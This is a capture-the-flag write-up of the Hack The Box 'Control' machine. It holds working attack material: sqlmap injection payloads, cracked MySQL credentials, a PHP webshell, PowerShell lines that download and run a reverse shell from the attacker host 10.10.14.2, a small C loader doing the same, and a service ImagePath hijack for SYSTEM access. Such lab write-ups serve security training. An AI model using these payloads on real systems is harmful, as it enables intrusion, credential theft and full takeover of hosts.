HTB Writeup: Control

How much control do you have on your own stuff?

Enumeration

nmap scan

# Nmap 7.92 scan initiated Wed Jun 22 05:43:29 2022 as: nmap -sC -sV -T3 -oA nmap-tcp-all-ports -p- -iL ip.txt
Nmap scan report for 10.129.121.9 (10.129.121.9)
Host is up (0.070s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 10.0
|_http-title: Fidelity
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc   Microsoft Windows RPC
3306/tcp  open  mysql?
49666/tcp open  msrpc   Microsoft Windows RPC
49667/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun 22 05:46:21 2022 -- 1 IP address (1 host up) scanned in 171.82 seconds
  1. A web application is detected on port TCP/80. Visiting the application, the navigation bar has two interesting locations listed. Admin and Login. Both locations lead to admin.php

    Untitled

  2. On visiting admin.php, a message is displayed.

    Access Denied: Header Missing. Please ensure you go through the proxy to access this page

    Untitled

  3. Visiting the home page again, and checking source code, an IP address is found: 192.168.4.28

    Untitled

  4. By adding the header X-Forwarded-For with value 192.168.4.28, the admin page becomes accessible.

    Untitled

    Untitled

  5. By clicking View on a product and intercepting the requests in a MITM proxy (BurpSuite here), it is found that a HTTP POST request is made with parameter productId in the request data.

    Untitled

  6. The request is then saved to a file and sqlmap is executed to check for possible SQL Injection. Since port tcp/3306 was detected in nmap scans, there is a high probability of backend being MySQL Server, which is then confirmed by sqlmap’s basic testing.

    POST parameter 'productId' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
    sqlmap identified the following injection point(s) with a total of 85 HTTP(s) requests:
    ---
    Parameter: productId (POST)
        Type: boolean-based blind
        Title: Boolean-based blind - Parameter replace (original value)
        Payload: productId=(SELECT (CASE WHEN (2431=2431) THEN 31 ELSE (SELECT 7302 UNION SELECT 4905) END))
       
        Type: stacked queries
        Title: MySQL >= 5.0.12 stacked queries (comment)
        Payload: productId=31;SELECT SLEEP(5)#
       
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: productId=31 AND (SELECT 1259 FROM (SELECT(SLEEP(5)))Eesi)
       
        Type: UNION query
        Title: Generic UNION query (NULL) - 1 column
        Payload: productId=31 UNION ALL SELECT CONCAT(0x716b707a71,0x6b4674726a726a53574d63507068586c4f4f516d67665778704d6d6a655a534a7579744b70534e70,0x7176767071)-- -
    ---
    [06:22:56] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows 2019 or 2016 or 10
    web application technology: PHP 7.3.7, Microsoft IIS 10.0
    

Initial Foothold

Exploiting SQL Injection

  1. Using sqlmap again, databases are dumped and enumerated further for valuable information/credentials.

  2. 3 databases are identified:

    1. information_schema
    2. mysql
    3. warehouse
  3. On further enumeration, 3 hashes are retrieved:

    hector:*0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
    manager:*CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
    root:*0A4A5CAD344718DC418035A1F4D292BA603134D8
    
  4. hashid is used to identify the hash types, which are found to be MySQL hashes.

  5. hashcat is then used to attempt recovering the plain text passwords from hashes. Wordlist of choice will be rockyou.txt

    hashcat -m 300 -a 0 control.hashes -O G:\Wordlists\rockyou.txt
       
    # -m to specify mode of hash (300 => MySQL)
    # -a to specify attack mode (0 => Dictionary based attack)
    # -O to use optimised kernel (performance enhancer, optional)
    

    Untitled

  6. Only hector’s password was available in the wordlist rockyou.txt. For other hashes, bruteforce or rule based attacks can be applied. hector:l33th4x0rhector

  7. With using wordlist crackstation.txt, credentials for manager are recovered. manager:l3tm3!n

  8. Current user is manager with FILE privileges, which allows for arbitrary file read and write. This privilege is the used to drop a PHP webshell in the web server directory C:\inetpub\wwwrootusing sqlmap’s --file-write functionality.

    <?php system($_GET['cmd']); ?>
    

    For reverse shell, an obfuscated version of [Invoke-PowerShellTcp.ps1](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) is used.

    powershell -ep bypass iex(iwr http://10.10.14.2:7070/obfuscated_rev.ps1 -usebasicparsing)
    

    The web request that triggered the reverse shell chain was:

    GET /shell_1.php?cmd=powershell%20-ep%20bypass%20iex(iwr%20http://10.10.14.2:7070/06222022_11_02_43/06222022_11_02_43.ps1%20-usebasicparsing) HTTP/1.1
    Host: 10.129.121.9
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    

    Untitled

  9. A powershell session with user nt authority/iusr is obtained.

User access

  1. Using the credentials for Hector obtained from MySQL database, a powershell command/process can be executed with privileges of Hector using Invoke-Command Commandlet and -credential parameter with creating a secure credential from username and password.

    $username = 'Fidelity\hector'
    $password = 'l33th4x0rhector'
    $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
    $cred = New-Object System.Management.Automation.PSCredential ($username, $securePassword)
    Invoke-Command -ComputerName 'Fidelity' -Credential $cred -ScriptBlock{iex(iwr http://10.10.14.2:7070/hector.ps1 -usebasicparsing)}
       
    # hector.ps1 is the same previously obfuscated powershell script, except it'll connect back on port 9090 instead.
    

    Untitled

Privilege Escalation

Enumeration

  1. On basic enumeration, powershell history file (Located in the folder C:\Users\<Username>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ folder) revealed two commands:

    get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
    get-acl HKLM:\SYSTEM\CurrentControlSet | format-list
    

    Untitled

  2. On checking Access Control Lists Rights (ACL Rights) on Services child item from HKLM\SYSTEM\CurrentControlset', it is found that the authenticated user Control\Hector has Full Control ACL rights on registry keys for Services, which implies Hector can modify any Service running on the remote host.

    PS C:\Users\Hector\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine> get-acl HKLM:\SYSTEM\CurrentControlSet\Services | format-list
       
    Path   : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
    Owner  : NT AUTHORITY\SYSTEM
    Group  : NT AUTHORITY\SYSTEM
    Access : CREATOR OWNER Allow  FullControl
             NT AUTHORITY\Authenticated Users Allow  ReadKey
             NT AUTHORITY\SYSTEM Allow  FullControl
             BUILTIN\Administrators Allow  FullControl
             CONTROL\Hector Allow  FullControl
             APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadKey
    Audit  :
    Sddl   : O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;KR;;;AU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)(A;CI;KA;;;S-1-5-21-3271572904-80546332
             -2170161114-1000)(A;CI;KR;;;AC)
    
  3. To exploit this misconfigured ACL and escalate privileges, a service is required that runs with the privileges of a high privileged user. Get-ChildItem can be used to list all services running with their respective privileges.

  4. Following command will list all the services registry that has 1 or more subkeys and have non null properties.

    get-childitem HKLM:\SYSTEM\CurrentControlset\Services | ?{$_.Property -like "*"} | ?{$_.SubkeyCount -notlike 0} | format-list
    
  5. It is found that CONTROL\Hector has full rights on registry keys for HKLM:\SYSTEM\CurrentControlset\Services\wuauserv, which is Windows Update Service, that runs with privileges of NT AUTHORITY\SYSTEM.

    get-acl HKLM:\SYSTEM\CurrentControlset\Services\wuauserv | format-list
       
    Path   : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services\wuauserv
    Owner  : NT AUTHORITY\SYSTEM
    Group  : NT AUTHORITY\SYSTEM
    Access : APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadKey
    NT AUTHORITY\SYSTEM Allow  FullControl
    CREATOR OWNER Allow  FullControl
    NT AUTHORITY\Authenticated Users Allow  ReadKey
    NT AUTHORITY\SYSTEM Allow  FullControl
    CONTROL\Hector Allow  FullControl
    BUILTIN\Administrators Allow  FullControl
    Audit  :
    Sddl   : O:SYG:SYD:AI(A;CIID;KR;;;AC)(A;ID;KA;;;SY)(A;CIIOID;KA;;;CO)(A;CIID;KR;;;AU)(A;CIIOID;KA;;;SY)(A;CIID;KA;;;S-1
    -5-21-3271572904-80546332-2170161114-1000)(A;CIID;KA;;;BA)
    

Exploitation

  1. To exploit the Windows Service, a custom exe has to be crafted which can either add CONTROL\Hector to the group of Local Administrators, create a new user with Administrative privileges, or connect back to our remote listener.

  2. On executing get-item HKLM:\SYSTEM\CurrentControlset\Services\wuauserv following attributes for the windows update service are obtained.

    PS C:\temp> get-item HKLM:\SYSTEM\CurrentControlset\Services\wuauserv
       
        Hive: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services
       
    Name                           Property
    ----                           --------
    wuauserv                       DependOnService     : {rpcss}
                                   Description         : @%systemroot%\system32\wuaueng.dll,-106
                                   DisplayName         : @%systemroot%\system32\wuaueng.dll,-105
                                   ErrorControl        : 1
                                   FailureActions      : {128, 81, 1, 0...}
                                   ImagePath           : C:\Windows\system32\svchost.exe -k netsvcs -p
                                   ObjectName          : LocalSystem
                                   RequiredPrivileges  : {SeAuditPrivilege, SeCreateGlobalPrivilege,
                                   SeCreatePageFilePrivilege, SeTcbPrivilege...}
                                   ServiceSidType      : 1
                                   Start               : 3
                                   SvcMemHardLimitInMB : 246
                                   SvcMemMidLimitInMB  : 167
                                   SvcMemSoftLimitInMB : 88
                                   Type                : 32
                                   ServiceDll          : C:\Windows\system32\wuaueng.dll
    
  3. The property ImagePath points to the default svchost.exe. Since the user Hector has Full Control ACL over this registry, the ImagePath can be modified to point to a malicious executable.

  4. For crafting a exe, it is to be kept in mind that there is an active antivirus on the remote host, hence msfvenom payloads won’t work well or will require AV Evasion techniques and/or obfuscations. Instead, a simple piece of code can work like the following:

    #include <string.h>
    #include <stdio.h>
    #include "windows.h"
       
    int main(){
       
        char* command = "cmd.exe /c \"powershell.exe -ep bypass iex(iwr http://10.10.14.2:7070/admin.ps1 -usebasicparsing)\"";
        system(command);
        return 0;
    }
       
    //admin.ps1 is the same obfuscated version of PowerShellTcp.ps1 with automatically connecting to 10.10.14.2:9092
    
  5. This can be compiled into a executable. The executable then can be checked on VirusTotal for detection score.

    Untitled

  6. The file service.exe is then downloaded and stored at C:\temp\service.exe

    iwr http://10.10.14.2:7070/service.exe -outfile C:\temp\service.exe
    
  7. Then, the registry can be modified using Set-ItemProperty commandlet available in powershell.

    set-itemproperty -Path "HKLM:\SYSTEM\CurrentControlset\Services\wuauserv" -Name "ImagePath" -Value "C:\temp\service.exe"
    
  8. Finally, the service is started using sc.exe . As soon as the service start, a reverse shell is obtained on listener running on TCP/9092 with privileges of nt authority\system

    sc.exe start wuauserv
    

    Untitled

The remote host is now completely compromised.

Avatar
Mayank Malik
CRTP | Incident Responder | Synack Red Team Member | Threat Analyst | Security Researcher | Cloud/Network Architect

Mayank Malik is a tech savvy person, Red Team Enthusiast, and likes to wander around to learn new stuff. Cryptography, Networking and System Administrations are his forte. He’s one of the Founding Members for CTF Team, Abs0lut3Pwn4g3, and Core Member at DC 91120 (DEFCON Community Group). Apart from the mentioned skills, he’s good at communication skills and is goal oriented person. Yellow belt holder at pwn.college in pursue of learning and achieving Blue Belt.

Related